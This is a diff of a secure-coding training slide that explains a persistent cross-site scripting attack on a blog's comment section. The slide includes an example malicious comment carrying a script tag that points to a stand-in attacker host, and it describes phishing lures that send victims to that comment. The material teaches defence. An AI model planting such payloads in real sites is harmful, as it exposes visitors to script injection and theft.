elephantscale/es-training-new/secure-coding/slides/Common-Attacks.md

 ---
 ## Persistent XSS Attack Example

-- A trusted blog allows users to post comments
+- A trusted blog allows users to post comments exactly as entered by the users
-- An attacker posts the following comment which contains a malicious script payload
+- An attacker posts the following comment which contains a malicious payload

 ```html
 Well thought out essay, loved it!!
 <script>http://attackerwebsite.com/maliciousscript.js</script>
 ```

-- When a user goes to the page containing the comment, the user's browser executes the payload
+- When a victim goes to the page containing the comment, the payload in the comment executes
 - The attack payload remains in persistent storage on the server
-- Multiple users may become targets of the attack
+- Multiple users may become victims of the attack
-- Phishing is used to direct uses deceptively to the payload
+- Phishing is used to deceptively direct victims to the URL containing the payload
 - _OMG!!!, can you believe what this guy wrote!!! (link to payload comment)_